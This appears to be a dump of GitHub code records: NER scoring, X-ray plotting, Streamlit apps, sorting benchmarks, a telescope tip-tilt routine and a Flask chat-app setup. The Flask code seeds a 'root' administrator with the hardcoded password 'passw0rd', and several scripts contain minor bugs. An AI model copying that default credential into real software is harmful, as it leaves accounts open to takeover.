%s')%(match_num, gold_num, recall))\n # print(('F1_value: %s')%(f_measure))\n return precision, recall, f_measure\n\n\ndef get_matched_ner_from_file(gold_file, pred_file, up_ignore_layer=0):\n gold_lines = open(gold_file, encoding='utf-8').readlines()\n pred_lines = open(pred_file, encoding='utf-8').readlines()\n sentence_num = len(gold_lines)\n assert (sentence_num == len(pred_lines))\n gold_entity = []\n pred_entity = []\n match_entity = []\n start_line = 0\n end_line = start_line + 1000000\n for idx in range(sentence_num):\n if idx >= end_line:\n continue\n if idx < start_line:\n continue\n # print gold_lines[idx]\n gold_filter_entity = filter_entity(get_ner_from_sentence(gold_lines[idx]), up_ignore_layer)\n # print \"gold:\", gold_filter_entity\n pred_filter_entity = filter_entity(get_ner_from_sentence(pred_lines[idx]), up_ignore_layer)\n # print \"pred:\",pred_filter_entity\n match = list(set(gold_filter_entity).intersection(set(pred_filter_entity)))\n gold_entity += gold_filter_entity\n pred_entity += pred_filter_entity\n match_entity += match\n return gold_entity, pred_entity, match_entity\n\n\ndef compare_f_measure_by_type(gold_file, pred_file):\n ## generate entity f score by entity type\n gold_entity, pred_entity, match_entity = get_matched_ner_from_file(gold_file, pred_file, 0)\n gold_type_dict = {}\n pred_type_dict = {}\n match_type_dict = {}\n for entity in gold_entity:\n entity_type = entity.split(':')[1]\n if entity_type in gold_type_dict:\n gold_type_dict[entity_type] += 1\n else:\n gold_type_dict[entity_type] = 1\n for entity in pred_entity:\n entity_type = entity.split(':')[1]\n if entity_type in pred_type_dict:\n pred_type_dict[entity_type] += 1\n else:\n pred_type_dict[entity_type] = 1\n for entity in match_entity:\n entity_type = entity.split(':')[1]\n if entity_type in match_type_dict:\n match_type_dict[entity_type] += 1\n else:\n match_type_dict[entity_type] = 1\n final_prf = []\n for entity in sorted(gold_type_dict.keys()):\n gold_num = gold_type_dict[entity]\n pred_num = 0\n match_num = 0\n if entity in pred_type_dict:\n pred_num = pred_type_dict[entity]\n if entity in match_type_dict:\n match_num = match_type_dict[entity]\n p, r, f = get_final_score(gold_num, pred_num, match_num)\n final_prf.append(entity + \":\" + p_r_f_string(p, r, f))\n over_gold_num = len(gold_entity)\n over_pred_num = len(pred_entity)\n over_match_num = len(match_entity)\n p, r, f = get_final_score(over_gold_num, over_pred_num, over_match_num)\n final_prf.append(\"Overall\" + \":\" + p_r_f_string(p, r, f))\n\n ## get f measure for chunk\n gold_entity, pred_entity, match_entity = get_matched_ner_from_file(gold_file, pred_file, 2)\n over_gold_num = len(gold_entity)\n over_pred_num = len(pred_entity)\n over_match_num = len(match_entity)\n p, r, f = get_final_score(over_gold_num, over_pred_num, over_match_num)\n final_prf.append(\"Chunk\" + \":\" + p_r_f_string(p, r, f))\n return final_prf\n\n\ndef get_ner_from_sentence(sentence):\n ## remove segmentation space, avoid segmentation changes\n sentence = sentence.strip().replace(' ', '')\n sentence_len = len(sentence)\n # print sentence\n entity_start = []\n words = []\n last_char = ''\n entity_type_start = False\n entity_type = ''\n word_id = 0\n entity_list = []\n for idx in range(sentence_len):\n if sentence[idx] == '[':\n left_bracket = True\n elif sentence[idx] == '@':\n if last_char == '[':\n entity_start.append(word_id)\n else:\n words.append(sentence[idx])\n word_id += 1\n elif sentence[idx] == '#':\n if len(entity_start) > 0:\n entity_type_start = True\n else:\n words.append(sentence[idx])\n word_id += 1\n elif sentence[idx] == ']':\n if last_char == '*':\n ## remove inside nested entity\n if len(entity_start) > 1:\n entity_start.pop()\n entity_type = ''\n entity_type_start = False\n elif len(entity_start) == 1:\n entity_info = '[' + str(entity_start[0]) + ',' + str(word_id - 1) + ']:' + entity_type.strip('*')\n entity_list.append(entity_info)\n entity_type = ''\n entity_start = []\n entity_type_start = False\n else:\n words.append(sentence[idx])\n word_id += 1\n else:\n if entity_type_start:\n entity_type += sentence[idx]\n else:\n words.append(sentence[idx])\n word_id += 1\n last_char = sentence[idx]\n # print entity_list\n return entity_list\n # print entity_list\n # for word in words:\n # print word, \" \",\n\n\ndef filter_entity(entity_list, up_ignore_layer=0):\n ## ignore entity type when calculate\n ignore_type = {}\n # ignore_type = {'Fin-Concept'}\n ## rename entity type\n # rename_type = {'Person-Name':'Person'}\n rename_type = {}\n filtered_list = []\n for entity in entity_list:\n pair = entity.split(':')\n entity_type = pair[-1]\n if entity_type not in ignore_type:\n if entity_type in rename_type:\n entity_type = rename_type[entity_type]\n if up_ignore_layer == 1:\n if '-' in entity_type:\n entity_type = entity_type.split('-')[0]\n elif up_ignore_layer == 2:\n entity_type = \"ENTITY\"\n filtered_list.append(pair[0] + ':' + entity_type)\n return filtered_list\n\n\ndef generate_f_value_report():\n file_list = [\n # \"exercise.chenhua.100.ann\",\n \"exercise.yangjie.100.ann\",\n \"exercise.shaolei.100.ann\",\n \"exercise.yuanye.100.ann\",\n # \"exercise.yanxia.100.ann\",\n # \"exercise.yuanye.100.ann\",\n \"exercise.yumin.100.ann\"\n # \"exercise.hongmin.100.ann\",\n # \"exercise.yuze.100.ann\"\n ]\n\n file_num = len(file_list)\n result_matrix = np.ones((file_num, file_num))\n result_matrix_ignore_1_layer = np.ones((file_num, file_num))\n result_matrix_ignore_2_layer = np.ones((file_num, file_num))\n for idx in range(file_num - 1):\n gold_file = file_list[idx]\n for idy in range(idx + 1, file_num):\n pred_file = file_list[idy]\n p, r, f = compare_files(gold_file, pred_file, 0)\n p1, r1, f1 = compare_files(gold_file, pred_file, 1)\n p2, r2, f2 = compare_files(gold_file, pred_file, 2)\n result_matrix[idx][idy] = f\n result_matrix[idy][idx] = f\n result_matrix_ignore_1_layer[idx][idy] = f1\n result_matrix_ignore_1_layer[idy][idx] = f1\n result_matrix_ignore_2_layer[idx][idy] = f2\n result_matrix_ignore_2_layer[idy][idx] = f2\n ## show final results\n print(\"FINAL REPORT: all_catagory/ignore_sub_catogary/entity_chunk\")\n print(\"F1-value\".rjust(10), )\n for idx in range(file_num):\n print(simplified_name(file_list[idx]).rjust(15), )\n print()\n for idx in range(file_num):\n print(simplified_name(file_list[idx]).rjust(15), )\n for idy in range(file_num):\n result = output_model(result_matrix[idx][idy], result_matrix_ignore_1_layer[idx][idy],\n result_matrix_ignore_2_layer[idx][idy])\n print(result.rjust(15), )\n print()\n\n\ndef calculate_average(input_array):\n length = input_array.shape[0]\n\n\ndef output_model(number1, number2):\n if number1 != 'Nan' and number1 != 'nan':\n if number1 == 1.0:\n return \" 100/100 \"\n else:\n num1 = str(round(number1 * 100, 1))\n else:\n num1 = str(number1)\n if number2 != 'Nan' and number2 != 'nan':\n if number2 == 1.0:\n num2 = \"100\"\n else:\n num2 = str(round(number2 * 100, 1))\n else:\n num2 = str(number2)\n return num1 + '/' + num2\n\n\ndef number_string(number):\n if number != 'Nan' and number != 'nan':\n return str(round(number * 100, 2))\n else:\n return str(number)\n\n\ndef p_r_f_string(precison, recall, f):\n return number_string(precison) + '/' + number_string(recall) + '/' + number_string(f)\n\n\ndef simplified_name(file_name):\n name = file_name.split('.')[1]\n return name\n\n\ndef generate_report_from_list(file_list):\n file_num = len(file_list)\n result_matrix = np.ones((file_num, file_num))\n result_matrix_boundary = np.ones((file_num, file_num))\n for idx in range(file_num - 1):\n gold_file = file_list[idx]\n for idy in range(idx + 1, file_num):\n pred_file = file_list[idy]\n p, r, f = compare_files(gold_file, pred_file, 0)\n p2, r2, f2 = compare_files(gold_file, pred_file, 2)\n result_matrix[idx][idy] = f\n result_matrix[idy][idx] = f\n result_matrix_boundary[idx][idy] = f2\n result_matrix_boundary[idy][idx] = f2\n final_matrix = []\n\n for idx in range(file_num):\n result_line = []\n for idy in range(file_num):\n result = output_model(result_matrix[idx][idy], result_matrix_boundary[idx][idy])\n result_line.append(result)\n final_matrix.append(result_line)\n return final_matrix\n\n\nif __name__ == '__main__':\n gold_file = \"sample.gold.ann\"\n pred_file = \"sample.pred.ann\"\n if len(sys.argv) > 2:\n compare_files(sys.argv[1], sys.argv[2])\n else:\n generate_f_value_report()\n","repo_name":"jiesutd/YEDDA","sub_path":"utils/metric4ann.py","file_name":"metric4ann.py","file_ext":"py","file_size_in_byte":11529,"program_lang":"python","lang":"en","doc_type":"code","stars":978,"dataset":"github-code","pt":"20"} +{"seq_id":"27626671609","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n#from tabletext import to_text\nimport xraylib as xrl\nfrom xpecgen import xpecgen as xg\n\ndef GetDensity(material):\n if material=='H2C':\n cpH2C = xrl.GetCompoundDataNISTByName('Polyethylene')\n density = cpH2C['density']\n elif material=='H2O':\n density = 1.\n elif material=='C2F4':\n density = 2.25\n else:\n Z=xrl.SymbolToAtomicNumber(material)\n density = xrl.ElementDensity(Z)\n return density\n\ndef mu(material='H2C'):\n energy_range = np.arange(5.,800., 0.1, dtype=np.double)\n density = GetDensity(material)\n print(f'density {material} = {density}')\n mu_rho = [xrl.CS_Total_CP(material, E) * density for E in energy_range]\n mu_rho_Photo = [xrl.CS_Photo_CP(material, E) * density for E in energy_range]\n mu_rho_Compt = [xrl.CS_Compt_CP(material, E) * density for E in energy_range]\n mu_rho_Rayl = [xrl.CS_Rayl_CP(material, E) * density for E in energy_range]\n plt.close(1)\n fig = plt.figure(num=1,dpi=150,clear=True)\n mpl.rcParams.update({'font.size': 6})\n axMW = plt.subplot(111)\n axMW.plot(energy_range, mu_rho,color=\"black\",linewidth=2.,linestyle=\"-\",label='Total')\n axMW.plot(energy_range, mu_rho_Photo,color=\"red\",linewidth=2.,linestyle=\"-\",label='Photoelectric')\n axMW.plot(energy_range, mu_rho_Compt,color=\"blue\",linewidth=2.,linestyle=\"-\",label='Compton')\n axMW.plot(energy_range, mu_rho_Rayl,color=\"green\",linewidth=2.,linestyle=\"-\",label='Rayleigh')\n axMW.set_xscale('log')\n axMW.set_yscale('log')\n axMW.set_xlim(np.min(energy_range),np.max(energy_range))\n axMW.set_ylim(1e-2,1e4)\n plt.legend(loc='center right', frameon=True)\n plt.xlabel('Energy (keV)')\n plt.ylabel(\"Linear attenuation coefficient (cm$^{-1}$)\")\n axMW.grid(which='major', axis='x', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='x', linewidth=0.3, linestyle='-', color='0.75')\n axMW.grid(which='major', axis='y', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='y', linewidth=0.3, linestyle='-', color='0.75')\n axMW.xaxis.set_major_formatter(mpl.ticker.FormatStrFormatter(\"%d\"))\n #axMW.xaxis.set_minor_formatter(mpl.ticker.FormatStrFormatter(\"%d\"))\n axMW.grid(True)\n #symbol=xrl.AtomicNumberToSymbol(material)\n axMW.set_title(\"%s\" % material, va='bottom')\n #plt.savefig('mu_over_rho_W.pdf', format='PDF')\n text=axMW.text(np.min(energy_range),1e4, \"\", va=\"top\", ha=\"left\")\n def onclick(event):\n energy = np.round(event.xdata*10)*0.1\n energyidx = int(np.where(np.min(np.abs(energy_range-energy))==np.abs(energy_range-energy))[0])\n tx = 'The linear attnuation coefficient of ' + material + ' at %.1f keV is %1.4e cm$^{-1}$\\n(Rayleigh %1.4e cm$^{-1}$, Photoelectric %1.4e cm$^{-1}$, Compton %1.4e cm$^{-1}$)'%(energy,mu_rho[energyidx],mu_rho_Rayl[energyidx],mu_rho_Photo[energyidx],mu_rho_Compt[energyidx])\n text.set_text(tx)\n text.set_x(axMW.get_xlim()[0])\n text.set_y(axMW.get_ylim()[1])\n cid = fig.canvas.mpl_connect('button_press_event', onclick)\n plt.show()\n \ndef spectrum(E0,Mat_Z,Mat_X):\n xrs=xg.calculate_spectrum(E0,12,3,100,epsrel=0.5,monitor=None,z=74)\n #Inherent filtration: 1.2mm Al + 100cm Air\n mu_Al=xg.get_mu(13)\n xrs.attenuate(0.12,mu_Al)\n xrs.attenuate(100,xg.get_mu(\"air\"))\n fluence_to_dose=xg.get_fluence_to_dose()\n xrs.set_norm(value=0.146,weight=fluence_to_dose)\n #Attenuation\n if Mat_Z>0: #Atomic number\n dMat = xrl.ElementDensity(Mat_Z)\n fMat = xrl.AtomicNumberToSymbol(Mat_Z)\n xrs.attenuate(0.1*Mat_X,xg.get_mu(Mat_Z))\n else: #-1 == 'Water'\n mH2O = 2. * xrl.AtomicWeight(1) + xrl.AtomicWeight(8)\n wH = 0.1 * Mat_X * 2. * xrl.AtomicWeight(1) / (xrl.ElementDensity(1) * mH2O)\n wO = 0.1 * Mat_X * xrl.AtomicWeight(8) / (xrl.ElementDensity(8) * mH2O)\n xrs.attenuate(wH,xg.get_mu(1))\n xrs.attenuate(wO,xg.get_mu(8))\n #Get the figures\n Nr_Photons = \"%.4g\" % (xrs.get_norm())\n Average_Energy = \"%.2f keV\" % (xrs.get_norm(lambda x:x)/xrs.get_norm())\n Dose = \"%.3g mGy\" % (xrs.get_norm(fluence_to_dose))\n HVL_Al=xrs.hvl(0.5,fluence_to_dose,mu_Al)\n HVL_Al_text = \"%.2f mm (Al)\" % (10*HVL_Al)\n a = [[\"Dose at 1m\", Dose],[\"Nr of photons\", Nr_Photons],\n [\"Average energy\",Average_Energy],[\"Half-value Layer\", HVL_Al_text]]\n #print(to_text(a))\n (x2,y2) = xrs.get_points()\n\n\n\n plt.close(2)\n plt.figure(num=2,dpi=150,clear=True)\n mpl.rcParams.update({'font.size': 6})\n axMW = plt.subplot(111)\n axMW.plot(x2,y2)\n axMW.set_xlim(3,E0)\n axMW.set_ylim(0,)\n plt.xlabel(\"Energy [keV]\")\n plt.ylabel(\"Nr of photons per [keV·cm²·mGy] @ 1m\")\n axMW.grid(which='major', axis='x', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='x', linewidth=0.2, linestyle='-', color='0.85')\n axMW.grid(which='major', axis='y', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='y', linewidth=0.2, linestyle='-', color='0.85')\n axMW.xaxis.set_major_formatter(mpl.ticker.FormatStrFormatter(\"%d\"))\n axMW.yaxis.set_major_formatter(mpl.ticker.FormatStrFormatter(\"%.2g\"))\n axMW.xaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())\n axMW.yaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())\n axMW.grid(True)\n plt.show()","repo_name":"effepivi/gvxr-demos","sub_path":"training-course/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"71140653169","text":"from flask import Flask, render_template, url_for, redirect, session, request, make_response\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport os\nimport base64\nfrom .path import get_project_root\n\napp = Flask(__name__, template_folder='../templates', static_folder='../static')\nconfig_file = os.path.join(get_project_root(), 'conf/allchat.cfg')\napp.config.from_pyfile(config_file, silent = True)\nsk_file = os.path.join(get_project_root(), 'conf/seckey')\nif not os.path.exists(sk_file):\n raw_key = os.urandom(32)\n with open(sk_file, 'wb') as f:\n f.write(raw_key)\nelse:\n with open(sk_file, 'rb') as f:\n raw_key = f.read()\napp.secret_key = base64.b64encode(raw_key).decode()\n\ndb = SQLAlchemy(app, session_options={'autoflush':False, 'expire_on_commit':False, \\\n 'autocommit':True})\nuser_states = dict()\n\n# from allchat.database.sql import get_session\nfrom allchat.database import init_db\nfrom allchat.database.models import UserAuth, UserInfo\nfrom allchat.authentication import authorized\nfrom allchat.administrator import views\nfrom allchat import messages\nfrom allchat.amqp import init_rpc\nfrom allchat import accounts\nfrom allchat import filestore\nfrom allchat import friends\nfrom allchat import groups\nfrom allchat import login\nfrom allchat import records\nfrom allchat import versions\n\napp.register_blueprint(versions.version)\napp.register_blueprint(accounts.account, url_prefix = '/v1')\napp.register_blueprint(login.login, url_prefix = '/v1')\napp.register_blueprint(friends.friend, url_prefix = '/v1')\napp.register_blueprint(groups.group, url_prefix = '/v1')\napp.register_blueprint(messages.message, url_prefix = '/v1')\napp.register_blueprint(filestore.filestore, url_prefix = '/v1')\napp.register_blueprint(records.record, url_prefix = '/v1')\n\ndef init_admin():\n user = db.session.query(UserInfo).filter_by(username='root').first()\n if user is None:\n admin = UserInfo(\"root\", \"XXX@XXX.XXX\")\n auth = UserAuth(\"root\", \"passw0rd\")\n db.session.begin()\n try:\n db.session.add(admin)\n db.session.add(auth)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n raise e\n#@app.before_first_request\ndef init():\n init_db()\n init_admin()\n init_rpc()\n \n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db_session = get_session()\n# if db_session is not None:\n# db_session.remove()\n\n@app.route('/', methods = ['GET'])\n@app.route('/index.html', methods = ['GET'])\ndef index():\n # db_session = db.session\n try:\n account = session['account']\n # token = request.headers['token']\n # auth = db_session.query(UserAuth).filter(db.and_(UserAuth.account == account, \\\n # UserAuth.deleted == False)).one()\n except Exception as e:\n return redirect(url_for('login'))\n else:\n # if not auth.is_token(token) or auth.is_token_timeout():\n # return redirect(url_for('login'))\n # else:\n resp = make_response(render_template('index.html'))\n return resp\n\n@app.route('/login.html', methods = ['GET'])\ndef login():\n return render_template('login.html')\n\n@app.route('/register.html', methods = ['GET'])\ndef signup():\n return render_template('register.html')\n","repo_name":"AllChat/AllChat","sub_path":"allchat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"20"} +{"seq_id":"31600304725","text":"import streamlit as st\nfrom PIL import Image\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\ndef create_task(count=3):\n texts=[]\n for i in range(count):\n text=[]\n text.append(st.sidebar.text_input(\"task\"+str(i+1), \"task\"+str(i+1)))\n slider=st.sidebar.slider(\"task\"+str(i+1)+\"の脳内比率\", 0, 10, 5)\n text=text*slider\n text=\" \".join(text)\n texts.append(text)\n return texts\n\ndef add_task(count):\n add_texts=[]\n for i in range(3, count+3):\n text=[]\n text.append(st.sidebar.text_input(\"task\"+str(i+1), \"task\"+str(i+1)))\n slider=st.sidebar.slider(\"task\"+str(i+1)+\"の脳内比率\", 0, 10, 5)\n text=text*slider\n text=\" \".join(text)\n add_texts.append(text)\n return add_texts\n\n\nst.title(\"脳内のタスクを整理しよう!\")\nst.sidebar.write(\"\"\"脳内比率が大きいtaskほど \n画像に強調されて表示されるよ!\"\"\")\nst.sidebar.write(\"taskを入力してね\")\n\ntexts=create_task()\ntexts=\" \".join(texts)\n\ninput_count=st.sidebar.number_input(\"追加するtaskの数を入力してください\", 0, 20)\nif input_count:\n add_texts=add_task(input_count)\n add_texts=\" \".join(add_texts)\n texts+=\" \"+add_texts\n\nfont_path=\"./ipaexg.ttf\"\nwc=WordCloud(width=1280, height=720, background_color=\"white\", font_path=font_path)\nwc.generate(texts)\n\nplt.axis(\"off\")\nplt.tight_layout()\nst.set_option('deprecation.showPyplotGlobalUse', False)\nplt.imshow(wc, interpolation='bilinear')\nst.pyplot()\n","repo_name":"nanaho-mu/wordCloud-streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34879532907","text":"import streamlit as st\nimport matplotlib.pyplot as plt\nfrom PIL import Image,ImageOps\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\n\nfrom imp import load_compiled\n\nimport json\nimport requests\nfrom streamlit_lottie import st_lottie\n\n\nmodel=load_model('cnn_model_65eps.h5')\n\nst.title(\"Brain tumer classification\",)\nst.header(\"Insert ur mri image\",)\ndef load_lottieurl(url:str):\n r=requests.get(url)\n if r.status_code !=200:\n return None\n return r.json()\nst.set_option('deprecation.showfileUploaderEncoding', False)\nfile_upload=st.file_uploader(\"Choose the mri file\",type=['jpg','png','jpeg'])\nif file_upload is None:\n lottie_coding=load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_iarc855d.json\")\n st_lottie(lottie_coding,height=100,width=100,key=None)\n st.write(\"you haven't put any images yet!\")\nelse: \n image = Image.open(file_upload)\n size=(227,227)\n image=ImageOps.fit(image,size,Image.ANTIALIAS)\n img=np.asarray(image)\n img_reshape=img[np.newaxis,...]\n st.image(img_reshape, caption='your mri image')\n prediction=model.predict(img_reshape)\n class_names=['glioma','meningioma','notumor','pituitary']\n string=class_names[np.argmax(prediction)]\n st.write(\"you have \",string)\n\n\nexpander=st.expander(\" you can also check symptons of tumor\")\nwith expander:\n option=st.selectbox('Select your tumor_type',('glioma_tumor','meningioma_tumor','pituitary_tumor'))\n st.write('You have selected',option)\n if option=='glioma_tumor':\n st.write(\"\"\"\n Common symptoms of Gliomas:Headache.\n Nausea or vomiting.\n Confusion or a decline in brain function.\n Memory loss.\n Personality changes or irritability.\n Difficulty with balance.\n Urinary incontinence.\n Vision problems, such as blurred vision, double vision or loss of peripheral vision\n \"\"\")\n elif option=='meningioma_tumor':\n st.write (\"\"\"Common symptoms of Meningioma_tumor:\n Changes in vision, such as seeing double or blurriness.\n Headaches, especially those that are worse in the morning.\n Hearing loss or ringing in the ears.\n Memory loss.\n Loss of smell.\n Seizures.\n Weakness in your arms or legs.\n Language difficulty.\"\"\") \n elif option=='pituitary_tumor':\n st.write(\"\"\" Common symptonms of pituitary_tumor:\n Nausea and vomiting.\n Weakness.\n Feeling cold.\n Less frequent or no menstrual periods.\n Sexual dysfunction.\n Increased amount of urine.\n Unintended weight loss or gain.\"\"\")\n else :\n st.write('please select')\nwith st.sidebar: \n st.success('Developed by INTEL AI')\n lottie_contact=load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_zj3qnsfs.json\")\n st.write(\"\"\"If you have any issues contact us\n thanthtoosan.mechatronic@gmail.com\"\"\")\n st_lottie(lottie_contact,height=60,width=60,key=None)\n\n \n","repo_name":"thant-san/project_mri","sub_path":"myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"7441473812","text":"import random\nimport time\nimport math\nimport sys\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef CreatePlot(input_data, exec_time, algo_name):\n plt.xlabel('Ulaz [n]')\n plt.ylabel('Vreme [ms]')\n plt.plot(input_data, exec_time, '-', label = algo_name)\n plt.legend()\n print(algo_name)\n for i in range(0, len(input_data)):\n print(\"input_data: \", input_data[i], \", exec_time: \", exec_time[i])\n\n\ndef RandomList(min, max, elements):\n list = random.sample(range(min, max), elements)\n return list\n\n\ndef SelectionSort(Array):\n for i in range(len(Array) - 1):\n minEl = i\n for j in range(i + 1, len(Array)):\n if(Array[j] < Array[minEl]):\n minEl = j\n Array[minEl], Array[i] = Array[i], Array[minEl]\n\ndef SortedTest(Array):\n testList = Array[:]\n testList.sort()\n if testList == Array:\n return True\n return False\n\n\ndef TestAndPlotAlgorithm(Algorithm):\n algo_name = Algorithm.__name__\n test_ranges = [10,100,1000,10000]\n input_data = []\n exec_time = []\n for n in test_ranges:\n Array = RandomList(0, 1000000 + 1, n)\n start_time = time.clock()\n Algorithm(Array)\n end_time = time.clock()\n exec_time.append((end_time - start_time))\n input_data.append(n)\n if(SortedTest):\n CreatePlot(input_data, exec_time, algo_name)\n\ndef Parent(i):\n return (i - 1) // 2\n\n\ndef Left(i):\n return 2 * i + 1\n\n\ndef Right(i):\n return 2 * i + 2\n\ndef MaxHeapify(Array, i):\n l = Left(i)\n r = Right(i)\n if l < heap_size and Array[l] > Array[i]:\n largest = l\n else:\n largest = i\n if r < heap_size and Array[r] > Array[largest]:\n largest = r\n if largest != i:\n Array[i], Array[largest] = Array[largest], Array[i]\n MaxHeapify(Array, largest)\n\n\ndef BuildMaxHeap(Array):\n global heap_size\n heap_size = len(Array)\n itterate = len(Array) // 2 - 1\n for i in range(itterate, -1, -1):\n MaxHeapify(Array, i)\n\n\ndef HeapSort(Array):\n global heap_size\n BuildMaxHeap(Array)\n for i in range(len(Array) - 1, 0, -1):\n Array[0], Array[i] = Array[i], Array[0]\n heap_size -= 1\n MaxHeapify(Array, 0)\n\n\ndef countingSort(arr, exp1):\n n = len(arr)\n # The output array elements that will have sorted arr\n output = [0] * (n)\n # initialize count array as 0\n count = [0] * (10)\n # Store count of occurrences in count[]\n for i in range(0, n):\n index = (arr[i]/exp1)\n count[ int((index)%10) ] += 1\n # Change count[i] so that count[i] now contains actual\n # position of this digit in output array\n for i in range(1,10):\n count[i] += count[i-1]\n \n # Build the output array\n i = n-1\n while i>=0:\n index = (arr[i]/exp1)\n output[ count[ int((index)%10) ] - 1] = arr[i]\n count[ int((index)%10) ] -= 1\n i -= 1\n \n # Copying the output array to arr[],\n # so that arr now contains sorted numbers\n i = 0\n for i in range(0,len(arr)):\n arr[i] = output[i]\n \n# Method to do Radix Sort\ndef radixSort(arr):\n \n # Find the maximum number to know number of digits\n max1 = max(arr)\n \n # Do counting sort for every digit. Note that instead\n # of passing digit number, exp is passed. exp is 10^i\n # where i is current digit number\n exp = 1\n while max1/exp > 0:\n countingSort(arr,exp)\n exp *= 10\n\nTestAndPlotAlgorithm(SelectionSort)\nTestAndPlotAlgorithm(HeapSort)\nTestAndPlotAlgorithm(radixSort)\nplt.show()\nplt.show()\n","repo_name":"SuvakovSrdjan/PAZadatak1","sub_path":"Zadatak1.py","file_name":"Zadatak1.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74482051249","text":"import ktl\n\nfrom kpf.KPFTranslatorFunction import KPFTranslatorFunction\nfrom kpf import (log, KPFException, FailedPreCondition, FailedPostCondition,\n FailedToReachDestination, check_input)\n\n\nclass ShutdownTipTilt(KPFTranslatorFunction):\n '''Shutdown the tip tilt system by setting the control mode to open loop\n and setting the target values in X and Y to 0.\n \n ARGS:\n =====\n None\n '''\n @classmethod\n def pre_condition(cls, args, logger, cfg):\n pass\n\n @classmethod\n def perform(cls, args, logger, cfg):\n kpfguide = ktl.cache('kpfguide')\n kpfguide['TIPTILT_CONTROL'].write('Inactive')\n kpfguide['TIPTILT_CALC'].write('Inactive')\n kpffiu = ktl.cache('kpffiu')\n tthome = ktl.cache('kpfguide', 'TIPTILT_HOME')\n home = tthome.read(binary=True)\n log.debug(f'Sending Tip tilt mirror to home: {home[0]} {home[1]}')\n kpffiu['TTXVAX'].write(home[0])\n kpffiu['TTYVAX'].write(home[1])\n log.debug('Opening tip tilt mirror servo loops')\n kpffiu['TTXSRV'].write('open')\n kpffiu['TTYSRV'].write('open')\n\n @classmethod\n def post_condition(cls, args, logger, cfg):\n timeout = cfg.getfloat('times', 'tip_tilt_move_time', fallback=0.1)\n success1 = ktl.waitFor('($kpffiu.TTXSRV == open)', timeout=timeout)\n success2 = ktl.waitFor('($kpffiu.TTYSRV == open)', timeout=timeout)\n if success1 == False or success2 == False:\n raise FailedPostCondition(f'TT{X,Y}SRV did not open')\n","repo_name":"KeckObservatory/KPFTranslator","sub_path":"kpf/fiu/ShutdownTipTilt.py","file_name":"ShutdownTipTilt.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"18287535079","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nLinear Regression with Gradient Descent\nAuthor: dowusu\nDate: Aug 24, 2020\n\"\"\"\n\ndef extractData():\n \"\"\"\n Extracts two-column data from file and returns two arrays.\n \"\"\"\n data_file = open('ex1data1.txt', 'r')\n data = [line.split(',') for line in data_file.read().strip().split('\\n')]\n x = np.array([float(entry[0]) for entry in data])\n y = np.array([float(entry[1]) for entry in data])\n return x, y\n\ndef plotLineData(x, y):\n \"\"\"\n Line plots x and y array data.\n \"\"\"\n figure = plt.figure()\n plt.plot(x, y, c='r')\n plt.xlabel('x data')\n plt.ylabel('y data')\n plt.title('Title')\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n\ndef plotScatterData(x, y):\n \"\"\"\n Scatter plots x and y array data.\n \"\"\"\n figure = plt.figure()\n plt.scatter(x, y, c='r', marker='x')\n plt.xlabel('x data')\n plt.ylabel('y data')\n plt.title('Title')\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n\ndef plotLineFit(x, y, theta):\n \"\"\"\n Plots parameter line fit with scatter data.\n \"\"\"\n num_examples = x.shape[0]\n ones = np.ones((num_examples,))\n X = np.vstack((x, ones)).T\n\n x_fit = X[:,0]\n y_fit = X.dot(theta)\n\n figure = plt.figure()\n plt.scatter(x, y, c='r', marker='x')\n plt.plot(x_fit, y_fit, c='b')\n plt.xlabel('x data')\n plt.ylabel('y data')\n plt.title('Title')\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n\n return X\n\ndef computeCost(X, y, theta, num_examples):\n \"\"\"\n Computes cost for gradient descent (represents how close hypothesis is to\n actual output).\n\n X: design matrix, feature columns and training example rows\n y: output, column vector of training example outputs\n theta: parameters that determine hypothesis (predicted output)\n num_examples: number of training examples\n \"\"\"\n hypothesis = X.dot(theta)\n return 1 / (2 * num_examples) * sum((hypothesis - y)**2)\n\ndef updateTheta(X, y, theta, learning_rate, num_examples):\n \"\"\"\n Updates parameter values using gradient descent formula.\n\n X: design matrix, feature columns and training example rows\n y: output, column vector of training example outputs\n theta: parameters that determine hypothesis (predicted output)\n learning_rate: determines step size for computing new theta values\n num_examples: number of training examples\n \"\"\"\n hypothesis = X.dot(theta)\n theta = theta - (learning_rate / num_examples) \\\n * (X.transpose().dot((hypothesis - y)))\n return theta\n\ndef gradientDescent(x, y):\n \"\"\"\n For linear regression, performs gradient descent for hard-coded number of\n iterations.\n\n x: array, one-variable input data 